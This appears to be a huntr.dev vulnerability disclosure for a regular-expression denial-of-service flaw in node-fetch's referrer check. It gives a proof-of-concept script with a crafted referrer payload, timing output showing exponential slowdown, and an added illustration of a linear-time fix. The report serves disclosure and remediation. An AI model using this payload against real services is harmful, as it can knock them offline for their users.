
Inefficient Regular Expression Complexity

2022-07-05 04:02:46
vovikhangcdv
www.huntr.dev
64

EPSS: 0.001 (Low), percentile 38.1%

Description

The regular expression node-fetch uses when checking whether a referrer's origin is Potentially Trustworthy has inefficient (super-linear) complexity, so a crafted referrer can cause a denial of service. With a payload of the form 'http://' + 'a.a.'.repeat(i) + 'a', a 76-character payload took 42642 ms to execute.

Proof of Concept

// PoC.js (run as an ES module so that top-level await is available)
import fetch from 'node-fetch';

for (let i = 1; i <= 1000; i++) {
    const time = Date.now();
    // Referrer of the form http://a.a.a. ... a; each iteration adds 4 characters
    const attack_str = 'http://' + 'a.a.'.repeat(i) + 'a';
    const response = await fetch(
        'https://google.com', /* any valid domain */
        { "referrer": attack_str }
    );
    const time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}

Output

attack_str.length: 12: 248 ms
attack_str.length: 16: 242 ms
attack_str.length: 20: 231 ms
attack_str.length: 24: 231 ms
attack_str.length: 28: 247 ms
attack_str.length: 32: 233 ms
attack_str.length: 36: 218 ms
attack_str.length: 40: 244 ms
attack_str.length: 44: 232 ms
attack_str.length: 48: 230 ms
attack_str.length: 52: 240 ms
attack_str.length: 56: 263 ms
attack_str.length: 60: 406 ms
attack_str.length: 64: 893 ms
attack_str.length: 68: 2908 ms
attack_str.length: 72: 10775 ms
attack_str.length: 76: 42642 ms
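The timings above grow roughly fourfold for every four characters added, which is the signature of a nested-quantifier regex backtracking exponentially on dot-separated labels. The block below is an added illustration by the editor, not node-fetch's code and not the reporter's PoC: it runs a host check of that shape (the pattern `^(.+\.)*localhost$` is assumed for illustration, not quoted from node-fetch's source) beside a linear-time replacement built from plain string comparison, and times both on the referrer shape used in the report. The function names `isLocalhostHost`, `isLocalhostHostRegex`, `buildReferrer` and `timeCheck` are the editor's.

```javascript
// Added example (editor's illustration, not node-fetch's code or the reporter's PoC).
// SUSPECT_RE is an assumed pattern of the vulnerable kind (nested quantifier over
// dot-terminated labels), not a quotation of the library's source.
const SUSPECT_RE = /^(.+\.)*localhost$/;

// Regex-based check of the shape under discussion: exponential on inputs made of
// many dot-separated labels that do not end in "localhost".
function isLocalhostHostRegex(host) {
  return SUSPECT_RE.test(host);
}

// Linear-time replacement: plain string comparison, no backtracking possible.
function isLocalhostHost(host) {
  const h = host.toLowerCase();
  return h === 'localhost' || h.endsWith('.localhost');
}

// Referrer of the shape used in the report: 'http://' + 'a.a.'.repeat(i) + 'a'.
function buildReferrer(i) {
  return 'http://' + 'a.a.'.repeat(i) + 'a';
}

// Extracts the host the way a referrer policy would (via the URL parser), runs the
// given check on it and returns the verdict plus elapsed milliseconds.
function timeCheck(check, referrer) {
  const host = new URL(referrer).host;
  const start = Date.now();
  const result = check(host);
  return { result, ms: Date.now() - start };
}

// Stand-alone demo. The regex variant is only run up to i = 12 (56-character
// referrer) because its cost roughly quadruples per step; the linear check runs
// all the way to the report's 76-character payload (i = 17).
for (let i = 1; i <= 17; i++) {
  const referrer = buildReferrer(i);
  const safe = timeCheck(isLocalhostHost, referrer);
  const line = `length ${referrer.length}: linear check ${safe.ms} ms`;
  if (i <= 12) {
    const slow = timeCheck(isLocalhostHostRegex, referrer);
    console.log(`${line}, regex check ${slow.ms} ms`);
  } else {
    console.log(line);
  }
}
```

Both checks return the same verdict for every host ('localhost', 'a.b.localhost', 'a.a.a'); only their cost differs. Note that an input length cap alone would not have helped here: the 76-character referrer carries a 69-character host, well under DNS name limits, so the defensive fix is to remove the nested quantifier (or replace the regex with string operations as above) rather than to bound the input. A regex linter that flags super-linear backtracking catches this class of pattern before it ships.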
